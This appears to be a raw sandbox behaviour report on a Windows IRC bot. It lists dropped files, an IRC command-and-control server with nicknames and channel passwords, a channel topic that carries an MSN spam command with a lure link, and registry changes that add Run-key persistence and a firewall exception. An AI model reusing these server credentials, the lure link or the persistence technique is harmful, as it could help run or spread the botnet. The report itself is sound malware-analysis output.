Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\system32\wbem\wbemdisp.TLB (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\system32\.HLP Flags: (SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Help\.HLP Flags: (SECURITY_ANONYMOUS)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\VMPipe32.dll (OPEN_EXISTING)
Create File: C:\WINDOWS\ntdtcstp.dll
Create File: C:\WINDOWS\cmsetac.dll
Create/Open File: \Device\RasAcd (OPEN_ALWAYS)
deli.byinter.net (turkish lamers)
deli.byinter.net 93.190.138.202
* C&C Server: 93.190.138.202:6667
* Server Password:
* Username: ryatoaj
* Nickname: [DEU|XP|516568]
* Channel: #!x!# (Password: cih4n1313)
* Channeltopic: :
* C&C Server: 93.190.138.202:6667
* Server Password:
* Username: XP-4392
* Nickname: [00|DEU|636610]
* Channel: #x# (Password: hacimackackac)
* Channeltopic: :.msn.stop|.msn.msg þu resme bi bakarmýsýn (yemekteyim) http://www.facebookbul.co.cc/images.php?=resim166-jpeg?=
* C&C Server: 93.190.138.202:6667
* Server Password:
* Username: aLeyna_yarak-istiyor
* Nickname: sevgi
* Channel: #X (Password: s1k1k)
* Channeltopic: :FFF
Registry Changes by all processes
Create or Open
Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Windows Services" = WINRAR2.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run "Windows Services" = WINRAR2.exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\WINDOWS\IMBOT.EXE" = C:\WINDOWS\IMBOT.EXE:*:Enabled:Windows Services
Reads
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\IMM "Ime File"
HKEY_CURRENT_USER\Software\Microsoft\CTF "Disable Thread Input Manager"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{F935DC20-1CF0-11D0-ADB9-00C04FD58A0B}\1.0\0 "win32"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\TypeLib\{00020430-0000-0000-C000-000000000046}\2.0\0 "win32"
HKEY_CURRENT_USER\Software\Microsoft\Visual Basic\6.0 "AllowUnsafeObjectPassing"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography "MachineGuid"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF\SystemShared "CUAS"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Language Hotkey"
HKEY_CURRENT_USER\Keyboard Layout\Toggle "Layout Hotkey"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CTF "EnableAnchorContext"
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\AppCompatibility "DisableAppCompat"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56F9679E-7826-4C84-81F3-532071A8BCC5}\InprocServer32 ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Search\ProtocolHandlers\File\0 "ProgID"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\file "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Mapi "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Outlookexpress "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\OTFS "ShellFolder"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Default "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.bmp "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.c "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cpp "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cs "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.cxx "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.doc "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.dot "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.emf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.eml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.err "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.gif "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.h "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.htm "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.html "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.hxx "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.idl "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpeg "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jpg "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.jsl "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mht "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.mhtml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.nws "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pdf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.png "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pot "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.pps "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.ppt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.rtf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.txt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.vb "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wmf "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.wrn "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xls "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xlt "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xml "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\Extension\.xsd "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\calendar "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\communications "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\contact "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\document "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\email "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\favorite "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\folder "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\im "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\images "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\music "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\note "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\picture "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\presentation "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\program "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\spreadsheet "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text ""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "ContentType"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "TemplateUrl"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\text "ScriptOk"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Desktop Search\Previewers\PerceivedType\video ""
